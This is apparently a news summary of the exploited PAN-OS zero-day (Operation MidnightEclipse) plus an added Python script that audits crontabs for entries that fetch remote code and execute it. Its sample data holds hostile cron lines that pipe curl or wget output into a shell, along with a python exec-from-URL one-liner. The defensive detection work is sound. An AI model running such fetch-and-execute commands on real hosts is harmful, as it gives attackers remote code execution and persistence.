"Palo Alto Networks Faces Zero-Day Backdoor Exploitation"

Threat actors have been exploiting a zero-day vulnerability in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on affected firewalls. The attack, known as Operation MidnightEclipse, involves the deployment of a Python-based backdoor to create a cron job that fetches and executes commands from an external server. The attackers have been observed creating a reverse shell, downloading additional tools, and exfiltrating data, prompting the U.S. Cybersecurity and Infrastructure Security Agency to add the flaw to its Known Exploited Vulnerabilities catalog. Organizations are advised to apply patches promptly, as the threat actor, dubbed UTA0218, is suspected to be state-backed and highly capable.
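The summary above describes the persistence mechanism in general terms: a cron job that periodically fetches commands from an external server and executes them. From a defender's point of view, that pattern (a network fetch piped into an interpreter, or a one-liner that downloads and `exec()`s code) is something a host audit can flag regardless of the specific payload. The script below is an added example written for this page; it is not code from the article, from Palo Alto Networks, or from any incident report. The crontab lines, addresses and URLs it scans are constructed sample data, and the regular expressions are illustrative heuristics, not a vendor-published signature.

```python
import re

# Constructed sample crontab content for demonstration only; the addresses are
# documentation ranges (RFC 5737) and do not come from the article or any real case.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.10/update | sh
* * * * * wget -qO- http://198.51.100.7/c.sh | bash
30 2 * * * /usr/bin/python3 /opt/backup/run.py
*/10 * * * * python3 -c "import urllib.request;exec(urllib.request.urlopen('http://203.0.113.10/x').read())"
@reboot /usr/local/bin/start-agent
"""

# Heuristic patterns (assumptions for this example, not a published detection rule):
# a network-fetch primitive ...
FETCH_TOOL = re.compile(r"\b(curl|wget|fetch)\b|urllib\.request|requests\.get", re.I)
# ... combined with a way to execute what was fetched.
EXEC_SINK = re.compile(r"\|\s*(sh|bash|dash|zsh|python3?|perl)\b|\bexec\(|\beval\(", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def parse_crontab(text):
    """Yield (schedule, command) pairs from crontab text.

    Skips blank lines, comments and environment assignments (KEY=value).
    Handles both the five-field schedule and @-style shortcuts such as @reboot.
    """
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
            continue
        if s.startswith("@"):
            parts = s.split(None, 1)
            if len(parts) == 2:
                yield parts[0], parts[1]
            continue
        parts = s.split(None, 5)
        if len(parts) < 6:
            continue
        yield " ".join(parts[:5]), parts[5]


def is_high_frequency(schedule):
    """True when the minute field runs every minute or on a */N step."""
    minute = schedule.split()[0]
    return minute == "*" or minute.startswith("*/")


def find_fetch_and_execute(text):
    """Return entries whose command both fetches from the network and executes the result."""
    findings = []
    for schedule, cmd in parse_crontab(text):
        if FETCH_TOOL.search(cmd) and EXEC_SINK.search(cmd):
            findings.append({
                "schedule": schedule,
                "command": cmd,
                "urls": URL.findall(cmd),
                "high_frequency": is_high_frequency(schedule),
            })
    return findings


if __name__ == "__main__":
    for f in find_fetch_and_execute(SAMPLE_CRONTAB):
        flag = " (high frequency)" if f["high_frequency"] else ""
        print(f"[{f['schedule']}]{flag} {f['command']}")
        for u in f["urls"]:
            print(f"    contacts: {u}")
```

On a real host the same function can be fed the output of `crontab -l` for each user or the contents of `/etc/cron.d/*`; anything it flags deserves a look at the destination address, the process that wrote the crontab entry, and the file modification time, since a periodic fetch-and-execute job is the kind of beachhead the summary describes rather than a normal administrative task.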
- Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack (The Hacker News)
- "Highly capable" hackers root corporate networks by exploiting firewall 0-day (Ars Technica)
- Palo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400) (Help Net Security)
- Palo Alto Networks Warns of Exploited Firewall Vulnerability (SecurityWeek)
- Palo Alto Networks Discloses Exploitation Of 'Critical' Zero-Day Flaw Impacting PAN-OS (CRN)